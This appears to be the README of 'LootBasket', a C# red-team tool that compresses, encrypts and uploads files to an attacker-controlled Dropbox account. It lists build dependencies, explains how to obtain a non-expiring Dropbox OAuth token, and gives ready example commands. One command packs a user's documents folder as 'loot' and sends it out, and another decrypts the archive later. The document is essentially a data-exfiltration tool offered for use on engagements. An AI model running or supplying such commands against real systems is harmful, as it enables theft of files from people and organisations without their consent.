# LootBasket
LootBasket is a C# tool for compressing, encrypting, and exfiltrating data to Dropbox using the Dropbox API. 

## Compiling
Target Framework: NET3.5

The libraries added via NuGet for this project were:

- CommandLineParser.1.9.71

- Costura.Fody.1.6.2

- DotNetZip.1.11.0

- Fody.2.1.2


## Usage
Log into your Dropbox account and head over to the [Dropbox developer API explorer](https://dropbox.github.io/dropbox-api-v2-explorer/#auth_token/from_oauth1) page and get an oauth access token by clicking "Get Token".
These access tokens do not expire, but you can revoke them.  So I would recommend revoking tokens after being used on engagments.

Example:

```
LootBasket.exe -f "C:\Users\admin\Documents\important-files" -t "DROPBOX-OATH-ACCESS-TOKEN-HERE" -o "C:\Users\Public\loot.zip"

```

LootBasket can Zip a single file or folder of items. The compressed file is then encrypted with a randomly generated password and uploaded to Dropbox.  The password is output to the console.  Copy the password and use with the "password" argument when decrypting. 

```
Usage: LootBasket <options>

      --help                       Display this help screen.

      -f, --path                  (Required) Full path to the file or folder you wish to compress

      -o, --OutFile                Name of the compressed file

      -t, --dropboxToken           Dropbox Access Token

      -p, --dropboxPath            (Default: /LootBasket/data) path to dropbox folder

      -d, --decrypt                (Default: False) Choose this to decrypt a zip file previously encrypted by this tool.

      -x, --decryption-password    Password to decrypt a zipped file.";
  ```
  
  
  Once the compressed/encrypted file is downloaded from Dropbox, you can use this tool to decrypt it as well. 
  
  Example: 
  
  ```
  LootBasket.exe -f "C:\Users\admin\Desktop\data" -o "C:\Users\admin\Desktop\decrypted-data.zip" -p "RandomlyGeneratedPassword" -d
  ```
  